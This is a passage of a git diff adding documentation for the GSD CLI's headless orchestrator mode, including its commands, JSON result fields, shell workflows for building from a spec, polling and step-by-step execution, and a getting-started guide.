+ +## Coexistence with `--supervised` + +Both `--answers` and `--supervised` can be active simultaneously. Priority order: + +1. Answer injector tries first +2. If no answer found, supervised mode forwards to the orchestrator +3. If no orchestrator response within `--response-timeout`, the auto-responder kicks in + +## Without Answer Injection + +Headless mode has built-in auto-responders for all prompt types: + +| Prompt Type | Default Behavior | +|-------------|-----------------| +| Select | Picks first option | +| Confirm | Auto-confirms | +| Input | Empty string | +| Editor | Returns prefill or empty | + +Answer injection overrides these defaults with specific answers when precision matters. + +## Diagnostics + +The injector tracks statistics printed in the session summary: + +| Stat | Description | +|------|-------------| +| `questionsAnswered` | Questions resolved from the answer file | +| `questionsDefaulted` | Questions handled by the default strategy | +| `secretsProvided` | Number of secrets injected | + +Unused question IDs and secret keys are warned about at exit. 
+
+## Example: Orchestrator with Answers
+
+```bash
+# Create answer file
+cat > answers.json << 'EOF'
+{
+  "questions": {
+    "test_framework": "vitest",
+    "package_manager": "pnpm"
+  },
+  "secrets": {
+    "OPENAI_API_KEY": "sk-...",
+    "DATABASE_URL": "postgres://localhost:5432/mydb"
+  },
+  "defaults": {
+    "strategy": "first_option"
+  }
+}
+EOF
+
+# Run with pre-supplied answers
+gsd headless --answers answers.json --output-format json auto 2>/dev/null
+
+# Parse result
+RESULT=$(gsd headless --answers answers.json --output-format json next 2>/dev/null)
+echo "$RESULT" | jq '{status: .status, cost: .cost.total}'
+```
diff --git a/gsd-orchestrator/references/commands.md b/gsd-orchestrator/references/commands.md
new file mode 100644
index 000000000..52b55d61a
--- /dev/null
+++ b/gsd-orchestrator/references/commands.md
@@ -0,0 +1,210 @@
+# GSD Commands Reference
+
+All commands run as subprocesses via `gsd headless [flags] [command] [args...]`.
+
+## Global Flags
+
+These flags apply to any `gsd headless` invocation:
+
+| Flag | Description |
+|------|-------------|
+| `--output-format <format>` | `text` (default), `json` (structured result), `stream-json` (JSONL) |
+| `--json` | Alias for `--output-format stream-json` |
+| `--bare` | Minimal context: skip CLAUDE.md, AGENTS.md, user settings, user skills |
+| `--resume <session-id>` | Resume a prior headless session by ID |
+| `--timeout N` | Overall timeout in ms (default: 300000) |
+| `--model ID` | Override LLM model |
+| `--supervised` | Forward interactive UI requests to orchestrator via stdout/stdin |
+| `--response-timeout N` | Timeout for orchestrator response in supervised mode (default: 30000ms) |
+| `--answers <file>` | Pre-supply answers and secrets from JSON file |
+| `--events <types>` | Filter JSONL output to specific event types (comma-separated, implies `--json`) |
+| `--verbose` | Show tool calls in progress output |
+
+## Exit Codes
+
+| Code | Meaning | When |
+|------|---------|------|
+| `0` | Success | Unit/milestone completed
 normally |
+| `1` | Error or timeout | Runtime error, LLM failure, or `--timeout` exceeded |
+| `10` | Blocked | Execution hit a blocker requiring human intervention |
+| `11` | Cancelled | User or orchestrator cancelled the operation |
+
+## Workflow Commands
+
+### `auto` (default)
+
+Autonomous mode — loop through all pending units until milestone complete or blocked.
+
+```bash
+gsd headless --output-format json auto
+```
+
+### `next`
+
+Step mode — execute exactly one unit (task/slice/milestone step), then exit. Recommended for orchestrators that need decision points between steps.
+
+```bash
+gsd headless --output-format json next
+```
+
+### `new-milestone`
+
+Create a milestone from a specification document.
+
+```bash
+gsd headless new-milestone --context spec.md
+gsd headless new-milestone --context spec.md --auto
+gsd headless new-milestone --context-text "Build a REST API" --auto
+cat spec.md | gsd headless new-milestone --context - --auto
+```
+
+Extra flags:
+- `--context <file>` — path to spec/PRD file (use `-` for stdin)
+- `--context-text <text>` — inline specification text
+- `--auto` — start auto-mode after milestone creation
+
+### `dispatch <phase>`
+
+Force-route to a specific phase, bypassing normal state-machine routing.
+
+```bash
+gsd headless dispatch research
+gsd headless dispatch plan
+gsd headless dispatch execute
+gsd headless dispatch complete
+gsd headless dispatch reassess
+gsd headless dispatch uat
+gsd headless dispatch replan
+```
+
+### `discuss`
+
+Start guided milestone/slice discussion.
+
+```bash
+gsd headless discuss
+```
+
+### `stop`
+
+Stop auto-mode gracefully.
+
+```bash
+gsd headless stop
+```
+
+### `pause`
+
+Pause auto-mode (preserves state, resumable).
+
+```bash
+gsd headless pause
+```
+
+## State Inspection
+
+### `query`
+
+**Instant JSON snapshot** — state, next dispatch, parallel costs. No LLM, ~50ms. The recommended way for orchestrators to inspect state.
+
+```bash
+gsd headless query
+gsd headless query | jq '.state.phase'
+gsd headless query | jq '.next'
+gsd headless query | jq '.cost.total'
+```
+
+### `status`
+
+Progress dashboard (TUI overlay — useful interactively, not for parsing).
+
+```bash
+gsd headless status
+```
+
+### `history`
+
+Execution history. Supports `--cost`, `--phase`, `--model`, and `limit` arguments.
+
+```bash
+gsd headless history
+```
+
+## Unit Control
+
+### `skip`
+
+Prevent a unit from auto-mode dispatch.
+
+```bash
+gsd headless skip
+```
+
+### `undo`
+
+Revert last completed unit. Use `--force` to bypass confirmation.
+
+```bash
+gsd headless undo
+gsd headless undo --force
+```
+
+### `steer <text>`
+
+Hard-steer plan documents during execution. Useful for mid-course corrections.
+
+```bash
+gsd headless steer "Skip the blocked dependency, use mock instead"
+```
+
+### `queue`
+
+Queue and reorder future milestones.
+
+```bash
+gsd headless queue
+```
+
+## Configuration & Health
+
+### `doctor`
+
+Runtime health checks with auto-fix.
+
+```bash
+gsd headless doctor
+```
+
+### `prefs`
+
+Manage preferences (global/project/status/wizard/setup).
+
+```bash
+gsd headless prefs
+```
+
+### `knowledge <text>`
+
+Add persistent project knowledge.
+
+```bash
+gsd headless knowledge "Always use UTC timestamps in API responses"
+```
+
+## Phases
+
+GSD workflows progress through these phases:
+
+```
+pre-planning → needs-discussion → discussing → researching → planning →
+executing → verifying → summarizing → advancing → validating-milestone →
+completing-milestone → complete
+```
+
+Special phases: `paused`, `blocked`, `replanning-slice`
+
+## Hierarchy
+
+- **Milestone**: Shippable version (4–10 slices, 1–4 weeks)
+- **Slice**: One demoable vertical capability (1–7 tasks, 1–3 days)
+- **Task**: One context-window-sized unit of work (one session)
diff --git a/gsd-orchestrator/references/json-result.md b/gsd-orchestrator/references/json-result.md
new file mode 100644
index 000000000..50eff75c8
--- /dev/null
+++ b/gsd-orchestrator/references/json-result.md
@@ -0,0 +1,162 @@
+# HeadlessJsonResult Reference
+
+When using `--output-format json`, GSD collects events silently and emits a single `HeadlessJsonResult` JSON object to stdout at process exit. This is the structured result for orchestrator decision-making.
+
+## Obtaining the Result
+
+```bash
+# Capture the JSON result
+RESULT=$(gsd headless --output-format json next 2>/dev/null)
+EXIT=$?
+
+# Parse fields with jq
+echo "$RESULT" | jq '.status'
+echo "$RESULT" | jq '.cost.total'
+echo "$RESULT" | jq '.nextAction'
+```
+
+**Important:** Progress text goes to stderr. The JSON result goes to stdout. Redirect stderr to `/dev/null` when parsing stdout.
+
+## Field Reference
+
+### Top-Level Fields
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `status` | `"success" \| "error" \| "blocked" \| "cancelled" \| "timeout"` | Final session status. Maps directly to exit codes. |
+| `exitCode` | `number` | Process exit code: `0` (success), `1` (error/timeout), `10` (blocked), `11` (cancelled). |
+| `sessionId` | `string \| undefined` | Session identifier. Pass to `--resume <session-id>` to continue this session.
| +| `duration` | `number` | Session wall-clock duration in milliseconds. | +| `cost` | `CostObject` | Token usage and cost breakdown. See below. | +| `toolCalls` | `number` | Total number of tool calls made during the session. | +| `events` | `number` | Total number of events processed during the session. | +| `milestone` | `string \| undefined` | Active milestone ID (e.g. `"M001"`). | +| `phase` | `string \| undefined` | Current GSD phase at session end (e.g. `"executing"`, `"blocked"`, `"complete"`). | +| `nextAction` | `string \| undefined` | Recommended next action from the state machine (e.g. `"dispatch"`, `"complete"`). | +| `artifacts` | `string[] \| undefined` | Paths to artifacts created or modified during the session. | +| `commits` | `string[] \| undefined` | Git commit SHAs created during the session. | + +### Status → Exit Code Mapping + +| Status | Exit Code | Constant | Meaning | +|--------|-----------|----------|---------| +| `success` | `0` | `EXIT_SUCCESS` | Unit or milestone completed successfully | +| `error` | `1` | `EXIT_ERROR` | Runtime error or LLM failure | +| `timeout` | `1` | `EXIT_ERROR` | `--timeout` deadline exceeded | +| `blocked` | `10` | `EXIT_BLOCKED` | Execution blocked — needs human intervention | +| `cancelled` | `11` | `EXIT_CANCELLED` | Cancelled by user or orchestrator | + +### Cost Object + +| Field | Type | Description | +|-------|------|-------------| +| `cost.total` | `number` | Total cost in USD for the session. | +| `cost.input_tokens` | `number` | Number of input tokens consumed. | +| `cost.output_tokens` | `number` | Number of output tokens generated. | +| `cost.cache_read_tokens` | `number` | Number of tokens served from prompt cache. | +| `cost.cache_write_tokens` | `number` | Number of tokens written to prompt cache. | + +## Parsing Patterns + +### Decision-Making After Each Step + +```bash +RESULT=$(gsd headless --output-format json next 2>/dev/null) +EXIT=$? 
+ +case $EXIT in + 0) + PHASE=$(echo "$RESULT" | jq -r '.phase') + NEXT=$(echo "$RESULT" | jq -r '.nextAction') + echo "Success — phase: $PHASE, next: $NEXT" + ;; + 1) + STATUS=$(echo "$RESULT" | jq -r '.status') + echo "Failed — status: $STATUS" + ;; + 10) + echo "Blocked — needs intervention" + gsd headless query | jq '.state' + ;; + 11) + echo "Cancelled" + ;; +esac +``` + +### Cost Tracking + +```bash +RESULT=$(gsd headless --output-format json next 2>/dev/null) + +COST=$(echo "$RESULT" | jq -r '.cost.total') +INPUT=$(echo "$RESULT" | jq -r '.cost.input_tokens') +OUTPUT=$(echo "$RESULT" | jq -r '.cost.output_tokens') + +echo "Cost: \$$COST (${INPUT} in / ${OUTPUT} out)" +``` + +### Session Resumption + +```bash +# First run — capture session ID +RESULT=$(gsd headless --output-format json next 2>/dev/null) +SESSION_ID=$(echo "$RESULT" | jq -r '.sessionId') + +# Resume the same session later +gsd headless --resume "$SESSION_ID" --output-format json next 2>/dev/null +``` + +### Artifact Collection + +```bash +RESULT=$(gsd headless --output-format json auto 2>/dev/null) + +# List files created/modified +echo "$RESULT" | jq -r '.artifacts[]?' + +# List commits made +echo "$RESULT" | jq -r '.commits[]?' +``` + +## Example Result + +```json +{ + "status": "success", + "exitCode": 0, + "sessionId": "abc123def456", + "duration": 45200, + "cost": { + "total": 0.42, + "input_tokens": 15000, + "output_tokens": 3500, + "cache_read_tokens": 8000, + "cache_write_tokens": 2000 + }, + "toolCalls": 12, + "events": 87, + "milestone": "M001", + "phase": "executing", + "nextAction": "dispatch", + "artifacts": [ + ".gsd/milestones/M001/slices/S01/tasks/T01-SUMMARY.md" + ], + "commits": [ + "a1b2c3d" + ] +} +``` + +## Combined with `query` for Full Picture + +The `HeadlessJsonResult` captures what happened during a session. Use `query` for the current project state: + +```bash +# What happened in this step? 
+RESULT=$(gsd headless --output-format json next 2>/dev/null) +echo "$RESULT" | jq '{status, cost: .cost.total, phase}' + +# What's the overall project state now? +gsd headless query | jq '{phase: .state.phase, progress: .state.progress, totalCost: .cost.total}' +``` diff --git a/gsd-orchestrator/templates/spec.md b/gsd-orchestrator/templates/spec.md new file mode 100644 index 000000000..441880f39 --- /dev/null +++ b/gsd-orchestrator/templates/spec.md @@ -0,0 +1,20 @@ +# [Product Name] + +## What +[One paragraph: what this product does. Be concrete — "A CLI tool that converts CSV files to JSON" not "A data transformation solution".] + +## Requirements +- [User can DO something specific and observable] +- [User can DO another specific thing] +- [System DOES something automatically] +- [Error case: system handles X gracefully] + +## Technical Constraints +- Language: [Node.js / Python / Go / Rust / etc.] +- Framework: [Express / FastAPI / none / etc.] +- External dependencies: [list APIs, databases, services] +- Environment: [Node >= 22 / Python 3.12+ / etc.] + +## Out of Scope +- [Explicit exclusion 1 — prevents scope creep] +- [Explicit exclusion 2] diff --git a/gsd-orchestrator/workflows/build-from-spec.md b/gsd-orchestrator/workflows/build-from-spec.md new file mode 100644 index 000000000..e3c70e02c --- /dev/null +++ b/gsd-orchestrator/workflows/build-from-spec.md @@ -0,0 +1,184 @@ +# Build From Spec + +End-to-end workflow: take a product idea or specification, produce working software. + +## Prerequisites + +- `gsd` CLI installed (`npm install -g gsd-pi`) +- A directory for the project (can be empty) +- Git initialized in the directory + +## Process + +### Step 1: Prepare the project directory + +```bash +PROJECT_DIR="/tmp/my-project-name" +mkdir -p "$PROJECT_DIR" +cd "$PROJECT_DIR" +git init 2>/dev/null # GSD needs a git repo +``` + +### Step 2: Write the spec file + +Write a spec file that describes what to build. More detail = better results. 
+ +```bash +cat > spec.md << 'SPEC' +# Product Name + +## What +[Concrete description of what to build] + +## Requirements +- [Specific, testable requirement 1] +- [Specific, testable requirement 2] +- [Specific, testable requirement 3] + +## Technical Constraints +- [Language, framework, or platform requirements] +- [External services or APIs involved] +- [Performance or security requirements] + +## Out of Scope +- [Things explicitly NOT included] +SPEC +``` + +**Spec quality matters.** Vague specs produce vague results. Include: +- What the user can DO when it's done (not what code to write) +- Technical constraints (language, framework, Node version) +- What's out of scope (prevents scope creep) + +### Step 3: Launch the build + +**Fire-and-forget (simplest — GSD does everything):** +```bash +cd "$PROJECT_DIR" +RESULT=$(gsd headless --output-format json --timeout 0 --context spec.md new-milestone --auto 2>/dev/null) +EXIT=$? +``` + +`--timeout 0` disables the timeout for long builds. `--auto` chains milestone creation into execution. + +**With budget limit:** +```bash +# Use step-by-step mode with budget checks instead of auto +# See workflows/step-by-step.md +``` + +**For CI or ecosystem runs (no user config):** +```bash +RESULT=$(gsd headless --bare --output-format json --timeout 0 --context spec.md new-milestone --auto 2>/dev/null) +EXIT=$? 
+``` + +### Step 4: Handle the result + +```bash +case $EXIT in + 0) + # Success — verify deliverables + STATUS=$(echo "$RESULT" | jq -r '.status') + COST=$(echo "$RESULT" | jq -r '.cost.total') + COMMITS=$(echo "$RESULT" | jq -r '.commits | length') + echo "Build complete: $STATUS, cost: \$$COST, commits: $COMMITS" + + # Inspect what was built + gsd headless query | jq '.state.progress' + + # Check the actual files + ls -la "$PROJECT_DIR" + ;; + 1) + # Error — inspect and decide + echo "Build failed" + echo "$RESULT" | jq '{status: .status, phase: .phase}' + + # Check state for details + gsd headless query | jq '.state' + ;; + 10) + # Blocked — needs intervention + echo "Build blocked — needs human input" + gsd headless query | jq '{phase: .state.phase, blockers: .state.blockers}' + + # Options: steer, supply answers, or escalate + # See workflows/monitor-and-poll.md for blocker handling + ;; + 11) + echo "Build was cancelled" + ;; +esac +``` + +### Step 5: Verify deliverables + +After a successful build, verify the output: + +```bash +cd "$PROJECT_DIR" + +# Check project state +gsd headless query | jq '{ + phase: .state.phase, + progress: .state.progress, + cost: .cost.total +}' + +# Check git log for what was built +git log --oneline + +# Run the project's own tests if they exist +[ -f package.json ] && npm test 2>/dev/null +[ -f Makefile ] && make test 2>/dev/null +``` + +## Complete Example + +```bash +# 1. Setup +mkdir -p /tmp/todo-api && cd /tmp/todo-api && git init + +# 2. Write spec +cat > spec.md << 'SPEC' +# Todo API + +Build a REST API for managing todo items using Node.js and Express. 
+ +## Requirements +- GET /todos — list all todos +- POST /todos — create a todo (title, completed) +- PUT /todos/:id — update a todo +- DELETE /todos/:id — delete a todo +- Todos stored in-memory (no database) +- Input validation with descriptive error messages +- Health check endpoint at GET /health + +## Technical Constraints +- Node.js with ESM modules +- Express framework +- No external database — in-memory array +- Port configurable via PORT env var (default 3000) + +## Out of Scope +- Authentication +- Persistent storage +- Frontend +SPEC + +# 3. Launch +RESULT=$(gsd headless --output-format json --timeout 0 --context spec.md new-milestone --auto 2>/dev/null) +EXIT=$? + +# 4. Report +if [ $EXIT -eq 0 ]; then + COST=$(echo "$RESULT" | jq -r '.cost.total') + echo "Build complete (\$$COST)" + echo "Files created:" + find . -not -path './.gsd/*' -not -path './.git/*' -type f +else + echo "Build failed (exit $EXIT)" + echo "$RESULT" | jq . +fi +``` diff --git a/gsd-orchestrator/workflows/monitor-and-poll.md b/gsd-orchestrator/workflows/monitor-and-poll.md new file mode 100644 index 000000000..346cb8613 --- /dev/null +++ b/gsd-orchestrator/workflows/monitor-and-poll.md @@ -0,0 +1,187 @@ +# Monitor and Poll + +Check status of a GSD project, handle blockers, track costs, and decide next actions. + +## Checking Project State + +The `query` command is your primary monitoring tool. It's instant (~50ms), costs nothing (no LLM), and returns the full project snapshot. + +```bash +cd /path/to/project +gsd headless query +``` + +### Key fields to inspect + +```bash +# Overall status +gsd headless query | jq '{ + phase: .state.phase, + milestone: .state.activeMilestone.id, + slice: .state.activeSlice.id, + task: .state.activeTask.id, + progress: .state.progress, + cost: .cost.total +}' + +# What should happen next +gsd headless query | jq '.next' +# Returns: { "action": "dispatch", "unitType": "execute-task", "unitId": "M001/S01/T01" } + +# Is it done? 
+gsd headless query | jq '.state.phase' +# "complete" = done, "blocked" = needs you, anything else = in progress +``` + +### Phase meanings + +| Phase | Meaning | Your action | +|-------|---------|-------------| +| `pre-planning` | Milestone exists, no slices planned yet | Run `auto` or `next` | +| `needs-discussion` | Ambiguities need resolution | Supply answers or run with defaults | +| `discussing` | Discussion in progress | Wait | +| `researching` | Codebase/library research | Wait | +| `planning` | Creating task plans | Wait | +| `executing` | Writing code | Wait | +| `verifying` | Checking must-haves | Wait | +| `summarizing` | Recording what happened | Wait | +| `advancing` | Moving to next task/slice | Wait | +| `evaluating-gates` | Quality checks before execution | Wait or run `next` | +| `validating-milestone` | Final milestone checks | Wait | +| `completing-milestone` | Archiving and cleanup | Wait | +| `complete` | Done | Verify deliverables | +| `blocked` | Needs human input | Handle blocker (see below) | +| `paused` | Explicitly paused | Resume with `auto` | + +## Handling Blockers + +When exit code is `10` or phase is `blocked`: + +```bash +# 1. Understand the blocker +gsd headless query | jq '{phase: .state.phase, blockers: .state.blockers, nextAction: .state.nextAction}' + +# 2. Option A: Steer around it +gsd headless steer "Skip the database dependency, use in-memory storage instead" + +# 3. Option B: Supply pre-built answers +cat > fix.json << 'EOF' +{ + "questions": { "blocked_question_id": "workaround_option" }, + "defaults": { "strategy": "first_option" } +} +EOF +gsd headless --answers fix.json auto + +# 4. Option C: Force a specific phase +gsd headless dispatch replan + +# 5. Option D: Escalate to user +echo "GSD build blocked. Phase: $(gsd headless query | jq -r '.state.phase')" +echo "Manual intervention required." 
+``` + +## Cost Tracking + +```bash +# Current cumulative cost +gsd headless query | jq '.cost.total' + +# Per-worker breakdown +gsd headless query | jq '.cost.workers' + +# After a step (from HeadlessJsonResult) +RESULT=$(gsd headless --output-format json next 2>/dev/null) +echo "$RESULT" | jq '.cost' +``` + +### Budget enforcement pattern + +```bash +MAX_BUDGET=15.00 + +check_budget() { + TOTAL=$(gsd headless query | jq -r '.cost.total') + OVER=$(echo "$TOTAL > $MAX_BUDGET" | bc -l) + if [ "$OVER" = "1" ]; then + echo "Budget exceeded: \$$TOTAL > \$$MAX_BUDGET" + gsd headless stop + return 1 + fi + return 0 +} +``` + +## Poll-and-React Loop + +For agents that need to periodically check on a build: + +```bash +cd /path/to/project + +poll_project() { + STATE=$(gsd headless query 2>/dev/null) + if [ -z "$STATE" ]; then + echo "NO_PROJECT" + return + fi + + PHASE=$(echo "$STATE" | jq -r '.state.phase') + COST=$(echo "$STATE" | jq -r '.cost.total') + PROGRESS=$(echo "$STATE" | jq -r '"\(.state.progress.milestones.done)/\(.state.progress.milestones.total) milestones, \(.state.progress.tasks.done)/\(.state.progress.tasks.total) tasks"') + + case "$PHASE" in + complete) + echo "COMPLETE cost=\$$COST progress=$PROGRESS" + ;; + blocked) + BLOCKER=$(echo "$STATE" | jq -r '.state.nextAction // "unknown"') + echo "BLOCKED reason=$BLOCKER cost=\$$COST" + ;; + *) + NEXT=$(echo "$STATE" | jq -r '.next.action // "none"') + echo "IN_PROGRESS phase=$PHASE next=$NEXT cost=\$$COST progress=$PROGRESS" + ;; + esac +} +``` + +## Resuming Work + +If a build was interrupted or you need to continue: + +```bash +cd /path/to/project + +# Check current state +gsd headless query | jq '.state.phase' + +# Resume from where it left off +gsd headless --output-format json auto 2>/dev/null + +# Or resume a specific session +gsd headless --resume "$SESSION_ID" --output-format json auto 2>/dev/null +``` + +## Reading Build Artifacts + +After completion, inspect what GSD produced: + +```bash +cd 
/path/to/project + +# Project summary +cat .gsd/PROJECT.md + +# What was decided +cat .gsd/DECISIONS.md + +# Requirements and their validation status +cat .gsd/REQUIREMENTS.md + +# Milestone summary +cat .gsd/milestones/M001-*/M001-*-SUMMARY.md 2>/dev/null + +# Git history (GSD commits per-slice) +git log --oneline +``` diff --git a/gsd-orchestrator/workflows/step-by-step.md b/gsd-orchestrator/workflows/step-by-step.md new file mode 100644 index 000000000..1690aa306 --- /dev/null +++ b/gsd-orchestrator/workflows/step-by-step.md @@ -0,0 +1,156 @@ +# Step-by-Step Execution + +Run GSD one unit at a time with decision points between steps. Use this when you need +control over execution — budget enforcement, progress reporting, conditional logic, +or the ability to steer mid-build. + +## When to use this vs `auto` + +| Approach | Use when | +|----------|----------| +| `auto` | You trust the build, just want the result | +| `next` loop | You need budget checks, progress updates, or intervention points | + +## Core Loop + +```bash +cd /path/to/project +MAX_BUDGET=20.00 +TOTAL_COST=0 + +while true; do + # Run one unit + RESULT=$(gsd headless --output-format json next 2>/dev/null) + EXIT=$? + + # Parse result + STATUS=$(echo "$RESULT" | jq -r '.status') + STEP_COST=$(echo "$RESULT" | jq -r '.cost.total') + PHASE=$(echo "$RESULT" | jq -r '.phase // empty') + SESSION_ID=$(echo "$RESULT" | jq -r '.sessionId // empty') + + # Handle exit codes + case $EXIT in + 0) ;; # success — continue + 1) + echo "Step failed: $STATUS" + break + ;; + 10) + echo "Blocked — needs intervention" + gsd headless query | jq '.state' + break + ;; + 11) + echo "Cancelled" + break + ;; + esac + + # Check if milestone complete + CURRENT_PHASE=$(gsd headless query | jq -r '.state.phase') + if [ "$CURRENT_PHASE" = "complete" ]; then + TOTAL_COST=$(gsd headless query | jq -r '.cost.total') + echo "Milestone complete. 
Total cost: \$$TOTAL_COST" + break + fi + + # Budget check + TOTAL_COST=$(gsd headless query | jq -r '.cost.total') + OVER=$(echo "$TOTAL_COST > $MAX_BUDGET" | bc -l) + if [ "$OVER" = "1" ]; then + echo "Budget limit (\$$MAX_BUDGET) exceeded at \$$TOTAL_COST" + gsd headless stop + break + fi + + # Progress report + PROGRESS=$(gsd headless query | jq -r '"\(.state.progress.tasks.done)/\(.state.progress.tasks.total) tasks"') + echo "Step done ($STATUS). Phase: $CURRENT_PHASE, Progress: $PROGRESS, Cost: \$$TOTAL_COST" +done +``` + +## Step-by-Step with Spec Creation + +Complete flow from idea to working code with full control: + +```bash +# 1. Setup +PROJECT_DIR="/tmp/my-project" +mkdir -p "$PROJECT_DIR" && cd "$PROJECT_DIR" && git init 2>/dev/null + +# 2. Write spec +cat > spec.md << 'SPEC' +[Your spec here] +SPEC + +# 3. Create the milestone (planning only, no execution) +RESULT=$(gsd headless --output-format json --context spec.md new-milestone 2>/dev/null) +EXIT=$? + +if [ $EXIT -ne 0 ]; then + echo "Milestone creation failed" + echo "$RESULT" | jq . + exit 1 +fi + +echo "Milestone created. Starting execution..." + +# 4. Execute step-by-step +STEP=0 +while true; do + STEP=$((STEP + 1)) + RESULT=$(gsd headless --output-format json next 2>/dev/null) + EXIT=$? + + [ $EXIT -ne 0 ] && break + + PHASE=$(gsd headless query | jq -r '.state.phase') + COST=$(gsd headless query | jq -r '.cost.total') + + echo "Step $STEP complete. 
Phase: $PHASE, Cost: \$$COST" + + [ "$PHASE" = "complete" ] && break +done + +echo "Build finished in $STEP steps" +``` + +## Intervention Patterns + +### Steer mid-execution + +If you detect the build going in the wrong direction: + +```bash +# Check what's happening +gsd headless query | jq '{phase: .state.phase, task: .state.activeTask}' + +# Redirect +gsd headless steer "Use SQLite instead of PostgreSQL for storage" + +# Continue +gsd headless --output-format json next 2>/dev/null +``` + +### Skip a stuck unit + +```bash +gsd headless skip +gsd headless --output-format json next 2>/dev/null +``` + +### Undo last completed unit + +```bash +gsd headless undo --force +gsd headless --output-format json next 2>/dev/null +``` + +### Force a specific phase + +```bash +gsd headless dispatch replan # Re-plan the current slice +gsd headless dispatch execute # Skip to execution +gsd headless dispatch uat # Jump to user acceptance testing +``` diff --git a/mintlify-docs/docs.json b/mintlify-docs/docs.json new file mode 100644 index 000000000..54bdfafea --- /dev/null +++ b/mintlify-docs/docs.json @@ -0,0 +1,101 @@ +{ + "$schema": "https://mintlify.com/docs.json", + "theme": "mint", + "name": "GSD", + "logo": { + "light": "/images/logo.svg", + "dark": "/images/logo.svg", + "href": "https://github.com/gsd-build/gsd-2/tree/main/docs" + }, + "favicon": "/images/favicon.svg", + "colors": { + "primary": "#7dcfff", + "light": "#7dcfff", + "dark": "#1a1b26" + }, + "appearance": { + "default": "dark" + }, + "background": { + "decoration": "gradient" + }, + "fonts": { + "heading": { + "family": "JetBrains Mono", + "weight": 700 + }, + "body": { + "family": "Inter", + "weight": 400 + } + }, + "navbar": { + "links": [ + { + "label": "GitHub", + "href": "https://github.com/gsd-build/gsd-2" + } + ], + "primary": { + "type": "button", + "label": "Install", + "href": "/getting-started" + } + }, + "footer": { + "socials": { + "github": "https://github.com/gsd-build/gsd-2" + } + }, + 
"navigation": { + "groups": [ + { + "group": "Getting started", + "pages": [ + "introduction", + "getting-started" + ] + }, + { + "group": "Core concepts", + "pages": [ + "guides/auto-mode", + "guides/commands", + "guides/git-strategy" + ] + }, + { + "group": "Configuration", + "pages": [ + "guides/configuration", + "guides/custom-models", + "guides/token-optimization", + "guides/dynamic-model-routing", + "guides/cost-management" + ] + }, + { + "group": "Features", + "pages": [ + "guides/captures-triage", + "guides/parallel-orchestration", + "guides/remote-questions", + "guides/skills", + "guides/visualizer", + "guides/web-interface", + "guides/working-in-teams" + ] + }, + { + "group": "Reference", + "pages": [ + "guides/troubleshooting", + "guides/migration" + ] + } + ] + }, + "search": { + "prompt": "Search GSD docs..." + } +} diff --git a/mintlify-docs/getting-started.mdx b/mintlify-docs/getting-started.mdx new file mode 100644 index 000000000..64cc49646 --- /dev/null +++ b/mintlify-docs/getting-started.mdx @@ -0,0 +1,187 @@ +--- +title: "Getting started" +description: "Install GSD, configure your LLM provider, and run your first autonomous session." +--- + +## Install + +```bash +npm install -g gsd-pi +``` + +Requires Node.js 22+ and Git. + + +**`command not found: gsd`?** Your shell may not have npm's global bin directory in `$PATH`. Run `npm prefix -g` to find it, then add `$(npm prefix -g)/bin` to your PATH. See [troubleshooting](/guides/troubleshooting) for details. + + +GSD checks for updates every 24 hours. Update in-session with `/gsd update`. + +## First launch + +```bash +gsd +``` + +On first launch, a setup wizard walks you through: + +1. **LLM provider** — 20+ providers (Anthropic, OpenAI, Google, OpenRouter, GitHub Copilot, Amazon Bedrock, Azure, and more). OAuth handles Claude Max and Copilot subscriptions automatically; otherwise paste an API key. +2. **Tool API keys** (optional) — Brave Search, Context7, Jina, Slack, Discord. 
Press Enter to skip any. + +Re-run the wizard anytime: + +```bash +gsd config +``` + +### Set up API keys + +For non-Anthropic models, you may need a search API key. Run `/gsd config` to set keys globally — they're saved to `~/.gsd/agent/auth.json` and apply to all projects. + +### Set up MCP servers + +To connect GSD to local or external MCP servers, add project-local config in `.mcp.json` or `.gsd/mcp.json`. See [configuration](/guides/configuration) for examples. Use `/gsd mcp` to verify connectivity. + +### Offline mode + +GSD works fully offline with local models (Ollama, vLLM, LM Studio). Configure a [custom model](/guides/custom-models) and GSD handles the rest — no internet connection required. + +## Choose a model + +GSD auto-selects a default model after login. Switch anytime: + +``` +/model +``` + +Or configure per-phase models in [preferences](/guides/configuration). + +## Two ways to work + + + + Type `/gsd` inside a session. GSD executes one unit at a time, pausing between each with a wizard showing what completed and what's next. + + - **No `.gsd/` directory** → starts a discussion to capture your project vision + - **Milestone exists, no roadmap** → discuss or research the milestone + - **Roadmap exists, slices pending** → plan the next slice or execute a task + - **Mid-task** → resume where you left off + + + Type `/gsd auto` and walk away. GSD autonomously researches, plans, executes, verifies, commits, and advances through every slice until the milestone is complete. + + ``` + /gsd auto + ``` + + See [auto mode](/guides/auto-mode) for the full details. + + + +## Two terminals, one project + +The recommended workflow: auto mode in one terminal, steering from another. 
+ +**Terminal 1 — let it build:** + +```bash +gsd +/gsd auto +``` + +**Terminal 2 — steer while it works:** + +```bash +gsd +/gsd discuss # talk through architecture decisions +/gsd status # check progress +/gsd queue # queue the next milestone +``` + +Both terminals read and write the same `.gsd/` files. Decisions in terminal 2 are picked up at the next phase boundary automatically. + +## Project structure + +GSD organizes work into a hierarchy: + +``` +Milestone → a shippable version (4-10 slices) + Slice → one demoable vertical capability (1-7 tasks) + Task → one context-window-sized unit of work +``` + +All state lives on disk in `.gsd/`: + + +``` +.gsd/ + PROJECT.md — what the project is right now + REQUIREMENTS.md — requirement contract (active/validated/deferred) + DECISIONS.md — append-only architectural decisions + KNOWLEDGE.md — cross-session rules, patterns, and lessons + RUNTIME.md — runtime context: API endpoints, env vars, services + STATE.md — quick-glance status + milestones/ + M001/ + M001-ROADMAP.md — slice plan with risk levels and dependencies + M001-CONTEXT.md — scope and goals from discussion + slices/ + S01/ + S01-PLAN.md — task decomposition + S01-SUMMARY.md — what happened + S01-UAT.md — human test script + tasks/ + T01-PLAN.md + T01-SUMMARY.md +``` + + +## Resume a session + +```bash +gsd --continue # or gsd -c +``` + +Resumes the most recent session. To pick from all saved sessions: + +```bash +gsd sessions +``` + +## VS Code extension + +GSD is also available as a VS Code extension (publisher: FluxLabs). It provides: + +- **`@gsd` chat participant** — talk to the agent in VS Code Chat +- **Sidebar dashboard** — connection status, model info, token usage, quick actions +- **Full command palette** — start/stop agent, switch models, export sessions + +The CLI (`gsd-pi`) must be installed first — the extension connects to it via RPC. 
